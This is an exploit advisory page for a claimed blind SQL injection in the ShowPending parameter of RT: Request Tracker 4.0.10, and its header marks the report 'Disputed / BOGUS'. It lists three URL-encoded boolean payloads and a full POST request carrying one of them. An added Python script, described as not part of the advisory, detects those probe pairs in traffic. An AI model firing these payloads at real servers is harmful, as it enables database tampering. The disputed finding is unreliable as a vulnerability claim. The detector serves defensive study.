Disputed / BOGUS

RT: Request Tracker 4.0.10 SQL Injection

Published / (Updated): 2013-04-11 / 2013-12-23
Credit: cheki
Risk: Medium
CWE: CWE-89
CVE: CVE-2013-3525
Local: No
Remote: Yes

CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: - SQL-Injection - RT: Request Tracker System
# Date: 10/05/2013
# Exploit Author: cheki
# Vendor Homepage: http://bestpractical.com/rt/
# Version: RT 4.0.10
# Tested on: Kali Linux

############################################
URL: http://10.10.10.70/Approvals/
Entity: ShowPending (Parameter)
Risk: It is possible to view, modify or delete database entries and tables
Causes: Sanitation of hazardous characters was not performed correctly on user input
Fix: Review possible solutions for hazardous character injection

#Description: Blind SQL Injection: append Boolean True/False string expressions, using apostrophes
and commenting out the rest of the query.
#The following changes were applied to the original request:
1) Set parameter 'ShowPending's value to '1%27+and+%27f%27%3D%27f%27%29+--+'
2) Set parameter 'ShowPending's value to '1%27+and+%27b%27%3D%27f%27%29+--'
3) Set parameter 'ShowPending's value to '1%27+or+%27b%27%3D%27f%27%29+--'


POST /Approvals/ HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Cookie: RT_SID_example.com.80=7c120854a0726239b379557f024cc1cb
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://10.10.10.70/Approvals/
Host: 10.10.10.70
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Length: 120

ShowPending=1%27+and+%27f%27%3D%27f%27%29+--+&ShowResolved=1&ShowRejected=1&ShowDependent=1&CreatedBefore=&CreatedAfter=

###############################################
Reasoning: The test result seems to indicate a vulnerability because it shows that values
can be appended to parameter values, indicating that they were embedded in an SQL query. In
this test, three (or sometimes four) requests are sent. The last is logically equal to the original, and the
next to last is different. Any others are for control purposes. A comparison of the last two responses with
the first (the last is similar to it, and the next to last is different) indicates that the application is vulnerable.
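The three ShowPending probes listed above and the response-comparison reasoning, turned into detection logic as an added example (not code from the advisory or from RT itself): it URL-decodes captured POST bodies to /Approvals/, recognises the `' and/or 'x'='y') --` probe shape, and flags a session that sent both a result-preserving and a result-changing variant, which is the differential pair a blind boolean test produces. The record format and session ids are constructed for this example.

```python
"""Added example: spot the boolean-based blind SQLi probe pairs from the advisory
in captured POST bodies. Not part of the advisory or of RT; records are constructed."""
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Probe shape from the advisory once URL-decoded, e.g.  1' and 'f'='f') --
# (quote, AND/OR, 'literal'='literal', optional closing paren, SQL comment)
PROBE_RE = re.compile(
    r"'\s*(and|or)\s+'([^']*)'\s*=\s*'([^']*)'\s*\)?\s*--", re.IGNORECASE)

def classify_value(value):
    """Return None if the value is not a probe. Otherwise return True when the
    injected condition leaves the query logically equal to the original
    (AND true, OR false) and False when it changes the result set
    (AND false, OR true), mirroring the advisory's last / next-to-last requests."""
    m = PROBE_RE.search(value)
    if m is None:
        return None
    op, lhs, rhs = m.group(1).lower(), m.group(2), m.group(3)
    literal_true = (lhs == rhs)
    return literal_true if op == "and" else not literal_true

def find_blind_probe_sessions(records, param="ShowPending"):
    """records: iterable of (session_id, urlencoded_body). A session that sends
    both an equivalent and a non-equivalent probe against the same parameter is
    running the differential test described above; return those session ids."""
    verdicts = defaultdict(set)
    for sid, body in records:
        for value in parse_qs(body, keep_blank_values=True).get(param, []):
            verdict = classify_value(value)   # parse_qs already decodes %27 and '+'
            if verdict is not None:
                verdicts[sid].add(verdict)
    return sorted(sid for sid, seen in verdicts.items() if seen == {True, False})

# Constructed sample traffic: "sess-A" replays the three advisory payloads,
# "sess-B" is an ordinary submission of the Approvals form.
SAMPLE_RECORDS = [
    ("sess-A", "ShowPending=1%27+and+%27f%27%3D%27f%27%29+--+&ShowResolved=1"),
    ("sess-A", "ShowPending=1%27+and+%27b%27%3D%27f%27%29+--&ShowResolved=1"),
    ("sess-A", "ShowPending=1%27+or+%27b%27%3D%27f%27%29+--&ShowResolved=1"),
    ("sess-B", "ShowPending=1&ShowResolved=1&ShowRejected=1&CreatedBefore="),
]

if __name__ == "__main__":
    print(find_blind_probe_sessions(SAMPLE_RECORDS))  # ['sess-A']
```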


Home Page: securitylabnews.blogspot.com

References:

http://bestpractical.com/rt/



Copyright 2015, cxsecurity.com